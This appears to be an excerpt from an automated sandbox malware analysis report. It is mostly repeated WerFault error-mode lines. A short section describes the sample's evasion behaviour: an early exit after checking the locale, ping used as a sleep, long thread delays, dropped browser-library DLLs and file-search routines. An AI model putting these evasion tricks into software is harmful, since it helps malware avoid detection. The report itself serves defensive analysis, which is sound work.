                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking locale)
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                    Uses ping.exe to sleep
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeMemory allocated: 1050000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeMemory allocated: 2B80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeMemory allocated: 29C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_15-132040
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifAPI coverage: 1.5 %
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeAPI coverage: 5.8 %
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif TID: 5892Thread sleep count: 48 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif TID: 5892Thread sleep time: -34128s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe TID: 1720Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_002C4005
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_002CC2FF
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C494A GetFileAttributesW,FindFirstFileW,FindClose,15_2_002C494A
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CCD14 FindFirstFileW,FindClose,15_2_002CCD14
